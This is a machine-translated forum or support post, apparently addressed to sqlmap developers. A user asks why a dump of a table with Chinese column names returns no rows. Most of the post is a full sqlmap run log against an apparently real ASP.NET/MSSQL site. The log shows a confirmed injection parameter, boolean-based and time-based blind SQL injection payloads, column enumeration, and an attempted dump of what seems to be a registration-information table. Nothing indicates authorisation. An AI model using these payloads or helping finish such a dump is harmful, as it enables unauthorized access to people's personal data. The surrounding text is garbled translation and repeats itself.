Technician I found the problem is that the fields will be automatically added Chinese [Chinese field xxx] brackets English field would not have brackets! English field xxx.
What the solution is not to add [] do?
The technician Hello! On the database, data table, and field are enumerated, but the content can not get! Data tables and fields are Chinese character, what is the way to solve it
C:\Python27\sqlmap>sqlmap.py -r 4.txt --level 4 --risk 3 --batch --timeout=180 -
-dump -T "报名信息表" -D "2014_SLS_Data"
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 10:15:10
[10:15:10] [INFO] parsing HTTP request from '4.txt'
[10:15:10] [INFO] resuming back-end DBMS 'microsoft sql server'
[10:15:10] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: S_BK_CLasss
Type: boolean-based blind
Title: Generic boolean-based blind - Parameter replace (original value)
Payload: S_BK_CLasss=(SELECT (CASE WHEN (1324=1324) THEN 123 ELSE 1/(SELECT
0) END))
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind - Parameter replace (hea
vy queries)
Payload: S_BK_CLasss=(SELECT (CASE WHEN (3994=3994) THEN (SELECT COUNT(*) FR
OM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers
AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 3994 END))
---
[10:15:10] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[10:15:10] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[10:15:10] [INFO] fetching columns for table '?????' in database '2014_SLS_Data'
[10:15:10] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[10:15:10] [INFO] retrieved:
[10:15:11] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[10:15:14] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
[10:15:14] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[10:15:14] [INFO] resumed: ID
[10:15:14] [INFO] resumed: ????
[10:15:14] [INFO] resumed: ??
[10:15:50] [INFO] fetching number of distinct values for column '[??????????]'
[10:15:50] [INFO] retrieved:
[10:15:50] [INFO] retrieved:
[10:15:51] [WARNING] no proper pivot column provided (with unique values). It wo
n't be possible to retrieve all rows
[10:15:51] [INFO] retrieved:
[10:15:51] [INFO] retrieved:
[10:15:52] [INFO] retrieved:
[10:15:53] [INFO] retrieved:
[10:15:54] [INFO] retrieved:
[10:15:55] [INFO] retrieved:
Database: 2014_SLS_Data
Table: ?????
[0 entries]
+----+------+------+------+------+------+------+------+------+------+------+----
----+--------+--------+--------+--------+--------+--------+--------+--------+---
-----+--------+--------+--------+--------+---------+---------+---------+--------
-+----------+----------+----------+----------+----------+----------+----------+-
----------+-----------+-----------+------------+--------------+
| ID | ?? | ?? | ?? | ?? | ?? | ?? | ?? | ?? | ?? | ?? | ???
? | ???? | ???? | ???? | ???? | ???? | ???? | ???? | ???? | ??
?? | ???? | ???? | ???? | ???? | ????? | ????? | ????? | ?????
| ?????? | ?????? | ?????? | ?????? | ?????? | ?????? | ?????? |
??????? | ??????? | ??????? | ???????? | ?????????? |
+----+------+------+------+------+------+------+------+------+------+------+----
----+--------+--------+--------+--------+--------+--------+--------+--------+---
-----+--------+--------+--------+--------+---------+---------+---------+--------
-+----------+----------+----------+----------+----------+----------+----------+-
----------+-----------+-----------+------------+--------------+
+----+------+------+------+------+------+------+------+------+------+------+----
----+--------+--------+--------+--------+--------+--------+--------+--------+---
-----+--------+--------+--------+--------+---------+---------+---------+--------
-+----------+----------+----------+----------+----------+----------+----------+-
----------+-----------+-----------+------------+--------------+
[10:15:56] [INFO] table '2014_SLS_Data.dbo.[?????]' dumped to CSV file 'C:\Pytho
n27\sqlmap\output\xxxxxxxxxxxxxxxxx\dump\2014_SLS_Data\?????.csv'
[10:15:56] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 312 times
[*] shutting down at 10:15:56
Technician I found the problem is that the fields will be automatically added Chinese [Chinese field xxx] brackets English field would not have brackets! English field xxx.
What the solution is not to add [] do?
The technician Hello! On the database, data table, and field are enumerated, but the content can not get! Data tables and fields are Chinese character, what is the way to solve it